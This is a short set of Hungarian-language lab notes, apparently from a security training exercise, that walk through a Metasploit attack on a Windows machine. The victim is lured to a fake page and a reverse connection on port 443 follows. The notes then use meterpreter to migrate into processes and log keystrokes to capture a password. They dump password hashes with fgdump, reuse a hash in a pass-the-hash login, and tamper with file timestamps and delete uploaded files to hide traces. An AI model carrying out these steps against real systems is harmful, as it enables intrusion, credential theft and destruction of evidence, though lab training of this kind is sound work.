keretrendszer tamadasok 1. kivalasztjuk az exploitot 2. kivalasztjuk a payloadot (mit akarunk csinalni) 3. parameterezes 4. futtatas http://www.ceg.hu/URI meglatoagattuk a fake lapot 80 porton visszanyit a 443 portra ps kilistazta a processeket migrate atlepes az explorer.exe-be keyscan_start aldozaton gepeltunk keyscan_dump elolvastuk aldozatot lockoltuk, majd feloldottuk keyscan_dump nem irt ki semmit migrate atlepes a winlogon.exe-be keyscan_start aldozaton gepeltunk keyscan_dump nem irt ki semmit aldozatot lockoltuk, majd feloldottuk keyscan_dump elolvastuk a jelszot screenshot megneztuk upload az fgdump.exe-t az aldozat gepere execute -H -c -f c:\\cmd.exe interact a command prompttal fgdump.exe futtatasa exit a commandprompt-bol download 127.0.0.1.pwdump aldozaton kesziteni egy megosztott alkonyvtarat, amihez CSAK a b nevu user fer hozza, de o full controll. iam felmasolasa a 2003-as gepre iam -h b:HackMe:00000000000000000000000000000000:03... -B belepunk a megosztott alkonyvtarra, mostmar be tudunk, letrehozunk par alkonyvtarat meterpreter shellbol tonkretesszuk az idobelyegeket az altalunk feltoltott/letrehozott fileokon. toroljuk az altalunk feltoltott/letrehozott filokat.